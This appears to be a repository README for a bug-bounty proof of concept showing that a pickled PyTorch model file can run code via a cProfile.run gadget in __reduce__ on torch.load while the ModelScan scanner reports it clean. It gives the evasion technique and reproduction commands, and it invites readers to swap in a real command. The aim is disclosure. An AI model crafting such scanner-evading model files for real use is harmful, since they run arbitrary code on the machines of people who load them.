YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
ModelScan Bypass β Arbitrary Code Execution in PyTorch .pt via cProfile.run gadget
Proof-of-concept for a Huntr Model File Format report.
model.pt runs code on torch.load(..., weights_only=False) while ModelScan reports it clean.
The malicious __reduce__ uses cProfile.run β a code-executing stdlib callable that is
not on ModelScan's PickleUnsafeOpScan denylist β and hides the command in a string
argument the scanner never inspects.
Files
model.ptβ the PoC model file (benign payload: writespytorch_poc_executed.txt)exploit.pyβ builds the model, scans it with ModelScan, loads it, prints the resultREADME.mdβ this file
Reproduce
pip install torch modelscan
# 1) scanner says it is safe:
modelscan -p model.pt # -> No issues found! π
# 2) loading with weights_only=False executes code:
python -c "import torch; torch.load('model.pt', weights_only=False)"
ls pytorch_poc_executed.txt # marker proves code ran on load
# or run everything at once:
python exploit.py # -> No issues found (BYPASS) + CODE EXECUTED
Impact
ModelScan is used to gate untrusted models in MLOps pipelines / model registries. This file passes the scan as clean yet achieves arbitrary code execution on load β defeating the control. Verified on PyTorch 2.6 / modelscan 0.8.6.
The vulnerability affects torch.load(weights_only=False) β common in legacy code and when
loading checkpoints. Modern PyTorch (2.6+) defaults to weights_only=True (safe), but many
production systems haven't upgraded or explicitly use weights_only=False.
The payload here is benign (writes a marker file). Swap the command in exploit.py to confirm
real command execution.